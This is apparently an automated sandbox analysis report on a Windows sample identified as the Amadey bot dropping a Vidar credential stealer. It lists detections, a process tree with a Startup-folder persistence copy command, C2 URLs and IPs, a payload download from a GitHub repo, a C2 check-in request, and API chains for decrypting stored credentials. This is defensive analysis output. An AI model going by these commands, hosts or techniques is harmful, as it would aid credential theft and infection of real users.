Windows Analysis Report
0XzeMRyE1e.exe

Overview

General Information

Sample Name: 0XzeMRyE1e.exe
Analysis ID: 637914
MD5: 4a2ac1e629644be2b37f29f21998c8d3
SHA1: a11cf92600e88810af392d2514795c165bcea940
SHA256: 7cb09dd4d3a661362b75ea236711ab5601f636edb0d2c647fa8f18e190678b1d
Tags: Amadey, exe
Infos:

Detection

Amadey, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Amadey's stealer DLL
Yara detected Amadey bot
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Drops PE files to the startup folder
Found stalling execution ending in API Sleep call
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into foreign processes
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 0XzeMRyE1e.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\0XzeMRyE1e.exe" MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
    • cmd.exe (PID: 4832 cmdline: C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 0XzeMRyE1e.exe (PID: 1284 cmdline: C:\Users\user\Desktop\0XzeMRyE1e.exe MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
      • file_22613.exe (PID: 6624 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" MD5: FE87E3591C90ECCD54C558FB487E262E)
  • 0XzeMRyE1e.exe (PID: 6456 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe" MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
    • 0XzeMRyE1e.exe (PID: 6984 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
  • file_22613.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" MD5: FE87E3591C90ECCD54C558FB487E262E)
  • file_22613.exe (PID: 6824 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" MD5: FE87E3591C90ECCD54C558FB487E262E)
  • cleanup
{"C2 url": "sigint.ws/f8dfksdj3/index.php", "Version": "3.10"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |

Source | Rule | Description | Author | Strings
0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000015.00000000.410768530.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000002.304714151.00000000038E3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
13.0.0XzeMRyE1e.exe.400000.10.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
16.2.0XzeMRyE1e.exe.37e2e08.5.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
21.0.0XzeMRyE1e.exe.400000.6.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
13.2.0XzeMRyE1e.exe.400000.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
21.0.0XzeMRyE1e.exe.400000.16.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349905802027700 06/02/22-01:55:08.307583
                        SID:2027700
                        Source Port:49905
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349788802027700 06/02/22-01:54:00.640844
                        SID:2027700
                        Source Port:49788
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349929802027700 06/02/22-01:55:15.780137
                        SID:2027700
                        Source Port:49929
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349871802027700 06/02/22-01:54:55.173382
                        SID:2027700
                        Source Port:49871
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349900802027700 06/02/22-01:55:06.323240
                        SID:2027700
                        Source Port:49900
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349834802027700 06/02/22-01:54:32.993751
                        SID:2027700
                        Source Port:49834
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349811802027700 06/02/22-01:54:15.765338
                        SID:2027700
                        Source Port:49811
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349869802027700 06/02/22-01:54:54.121449
                        SID:2027700
                        Source Port:49869
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349817802027700 06/02/22-01:54:19.458105
                        SID:2027700
                        Source Port:49817
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349830802027700 06/02/22-01:54:30.708454
                        SID:2027700
                        Source Port:49830
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349764802027700 06/02/22-01:53:40.683010
                        SID:2027700
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349793802027700 06/02/22-01:54:02.814058
                        SID:2027700
                        Source Port:49793
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349887802027700 06/02/22-01:55:00.209740
                        SID:2027700
                        Source Port:49887
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:80.66.64.103192.168.2.480497642838063 06/02/22-01:53:40.865782
                        SID:2838063
                        Source Port:80
                        Destination Port:49764
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349853802027700 06/02/22-01:54:46.902584
                        SID:2027700
                        Source Port:49853
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349906802027700 06/02/22-01:55:08.703562
                        SID:2027700
                        Source Port:49906
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349800802027700 06/02/22-01:54:09.502750
                        SID:2027700
                        Source Port:49800
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349835802027700 06/02/22-01:54:33.554231
                        SID:2027700
                        Source Port:49835
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349858802027700 06/02/22-01:54:49.360293
                        SID:2027700
                        Source Port:49858
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349901802027700 06/02/22-01:55:06.719832
                        SID:2027700
                        Source Port:49901
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349806802027700 06/02/22-01:54:12.991151
                        SID:2027700
                        Source Port:49806
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349803802027700 06/02/22-01:54:11.166089
                        SID:2027700
                        Source Port:49803
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349812802027700 06/02/22-01:54:16.364540
                        SID:2027700
                        Source Port:49812
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349916802027700 06/02/22-01:55:12.621332
                        SID:2027700
                        Source Port:49916
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349861802027700 06/02/22-01:54:50.675680
                        SID:2027700
                        Source Port:49861
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349852802027700 06/02/22-01:54:46.408172
                        SID:2027700
                        Source Port:49852
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349888802027700 06/02/22-01:55:00.609327
                        SID:2027700
                        Source Port:49888
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349922802027700 06/02/22-01:55:14.194314
                        SID:2027700
                        Source Port:49922
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349799802027700 06/02/22-01:54:08.864611
                        SID:2027700
                        Source Port:49799
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349836802027700 06/02/22-01:54:34.112033
                        SID:2027700
                        Source Port:49836
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349833802027700 06/02/22-01:54:32.459145
                        SID:2027700
                        Source Port:49833
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349827802027700 06/02/22-01:54:28.893296
                        SID:2027700
                        Source Port:49827
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349925802027700 06/02/22-01:55:14.580879
                        SID:2027700
                        Source Port:49925
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349831802027700 06/02/22-01:54:31.147059
                        SID:2027700
                        Source Port:49831
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349919802027700 06/02/22-01:55:13.807547
                        SID:2027700
                        Source Port:49919
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349825802027700 06/02/22-01:54:27.778293
                        SID:2027700
                        Source Port:49825
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349791802027700 06/02/22-01:54:01.965478
                        SID:2027700
                        Source Port:49791
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349785802027700 06/02/22-01:53:59.351850
                        SID:2027700
                        Source Port:49785
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349914802027700 06/02/22-01:55:11.848128
                        SID:2027700
                        Source Port:49914
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349874802027700 06/02/22-01:54:56.482566
                        SID:2027700
                        Source Port:49874
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349866802027700 06/02/22-01:54:52.699550
                        SID:2027700
                        Source Port:49866
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349819802027700 06/02/22-01:54:20.991169
                        SID:2027700
                        Source Port:49819
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349903802027700 06/02/22-01:55:07.519813
                        SID:2027700
                        Source Port:49903
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349880802027700 06/02/22-01:54:58.245914
                        SID:2027700
                        Source Port:49880
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349891802027700 06/02/22-01:55:01.891788
                        SID:2027700
                        Source Port:49891
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349849802027700 06/02/22-01:54:41.432432
                        SID:2027700
                        Source Port:49849
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349796802027700 06/02/22-01:54:04.522416
                        SID:2027700
                        Source Port:49796
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349814802027700 06/02/22-01:54:17.528472
                        SID:2027700
                        Source Port:49814
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349885802027700 06/02/22-01:54:59.420913
                        SID:2027700
                        Source Port:49885
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349855802027700 06/02/22-01:54:48.113243
                        SID:2027700
                        Source Port:49855
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349808802027700 06/02/22-01:54:14.080650
                        SID:2027700
                        Source Port:49808
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349850802027700 06/02/22-01:54:42.196474
                        SID:2027700
                        Source Port:49850
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected


                        AV Detection

                        Source: http://sigint.ws/f8dfksdj3/index.php, Avira URL Cloud: Label: malware
                        Source: http://sigint.ws/f8dfksdj3/index.php2, Avira URL Cloud: Label: malware
                        Source: http://sigint.ws/f8dfksdj3/index.phpD%, Avira URL Cloud: Label: malware
                        Source: sigint.ws/f8dfksdj3/index.php, Avira URL Cloud: Label: malware
                        Source: 13.2.0XzeMRyE1e.exe.400000.0.unpack, Malware Configuration Extractor: Amadey {"C2 url": "sigint.ws/f8dfksdj3/index.php", "Version": "3.10"}
                        Source: 0XzeMRyE1e.exe, Virustotal: Detection: 36%
                        Source: 0XzeMRyE1e.exe, Metadefender: Detection: 14%
                        Source: 0XzeMRyE1e.exe, ReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe, Metadefender: Detection: 20%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe, ReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Metadefender: Detection: 20%
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, ReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe, Metadefender: Detection: 14%
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe, ReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Joe Sandbox ML: detected
                        Source: 17.3.file_22613.exe.d5d0000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040B5AD CreateMutexA,GetLastError,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,CreateDirectoryA,SetCurrentDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,CreateDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,CloseHandle,SetCurrentDirectoryA,SHFileOperation
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_004032BE __EH_prolog3,RegOpenKeyExA,GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,_strcpy_s,GetProcessHeap,HeapFree,_strcpy_s,RegEnumValueA
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040F4BC _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040F64C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040F6A5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040F8E3 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove
                        Source: 0XzeMRyE1e.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: unknown, HTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49759 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49766 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49893 version: TLS 1.2
                        Source: 0XzeMRyE1e.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe, 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Tex\Ras sav\Quevah\Bopo nan.pdb source: file_22613.exe, file_22613.exe, 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000011.00000000.330984448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000002.508562908.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000000.360616448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000000.380119657.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000002.508484154.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613[1].exe.13.dr, file_22613.exe.13.dr
                        Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\ClassLibrary1\obj\Release\ClassLibrary1.pdb source: 0XzeMRyE1e.exe, 00000000.00000002.308828876.00000000094E0000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000000.00000002.301026710.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.450200051.0000000008C00000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Administrator\Desktop\attachments\obj\Debug\Zonli.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe.7.dr
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_004099F2 _memset,_memset,_memset,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe, Code function: 13_2_0041E2F2 FindFirstFileExW
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00408117 __EH_prolog3_GS,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcatW,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00411133 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040950A wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0041778D __EH_prolog3_GS,FindFirstFileW,FindNextFileW
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_0040895E __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00412AE1 __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00408B6B __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00412D6E __EH_prolog3_GS,wsprintfA,FindFirstFileA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00411E67 __EH_prolog3_GS,__wgetenv,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 17_2_00410EAE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 4x nop then mov eax, dword ptr fs:[00000030h], 17_2_00401000
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe, Code function: 4x nop then mov dword ptr [ebp-04h], eax, 17_2_00401000

                        Networking

                        Source: Traffic, Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49764 -> 80.66.64.103:80
                        Source: Traffic, Snort IDS: 2838063 ETPRO TROJAN Amadey CnC Server Payload Response (exe) 80.66.64.103:80 -> 192.168.2.4:49764
                        Source: Malware configuration extractor URLs: sigint.ws/f8dfksdj3/index.php
                        Source: global traffic HTTP traffic detected: GET /760 HTTP/1.1 Host: north.ac Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /neiqops/ajajaj/main/file_22613.exe HTTP/1.1 Connection: Keep-Alive Host: raw.githubusercontent.com
                        Source: global traffic HTTP traffic detected: GET /hyipsdigest HTTP/1.1 Host: t.me
                        Source: global traffic HTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sigint.ws Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global traffic HTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1 Host: github.com
